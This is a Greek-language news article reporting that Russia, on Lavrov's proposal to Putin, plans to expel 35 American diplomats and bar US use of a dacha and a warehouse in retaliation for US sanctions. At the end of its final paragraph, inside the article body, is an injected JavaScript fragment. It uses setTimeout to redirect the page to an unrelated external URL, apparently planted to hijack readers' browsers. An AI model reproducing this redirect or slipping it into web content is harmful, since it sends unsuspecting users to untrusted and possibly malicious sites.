Ο Πούτιν απαντά στον Ομπάμα: Απελαύνει 35 Αμερικανούς διπλωμάτες

0
3

 

Σύμφωνα με όσα μεταδίδουν τα ρωσικά πρακτορεία ειδήσεων, η Ρωσία ετοιμάζεται να απαντήσει στις αμερικανικές κυρώσεις και την επέλαση 35 Ρώσων διπλωματών αλλά και το κλείσιμο δύο ρωσικών κτιριακών συγκροτημάτων, ακριβώς με τον ίδιο τρόπο.

Δηλαδή την απέλαση 35 Αμερικανών διπλωματών αλλά και την απαγόρευση στα μέλη της αμερικανικής διπλωματικής αποστολής να χρησιμοποιούν μια «ντάτσα» και μια αποθήκη στη Μόσχα.

 Σύμφωνα με το Ria Novosti το ρωσικό ΥΠΕΞ πρότεινε συγκεκριμένα στον Πούτιν, 31 υπάλληλοι της πρεσβείας των ΗΠΑ στη Μόσχα και 4 διπλωματικοί υπάλληλοι από το προξενείο της Αγίας Πετρούπολης να κηρυχθούν persona non grata και να απελαθούν.

Ο υπουργός Εξωτερικών Σεργκέι Λαβρόφ δήλωσε, σύμφωνα με τα πρακτορεία, ότι είχε προτείνει τα μέτρα στον πρόεδρο Βλαντίμιρ Πούτιν. Ο Λαβρόφ δήλωσε ότι η Ρωσία δεν θα αφήσει αναπάντητο το θέμα των κυρώσεων και ότι οι ισχυρισμοί πως η Ρωσία ενεπλάκη στις αμερικανικές εκλογές είναι αβάσιμοι. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here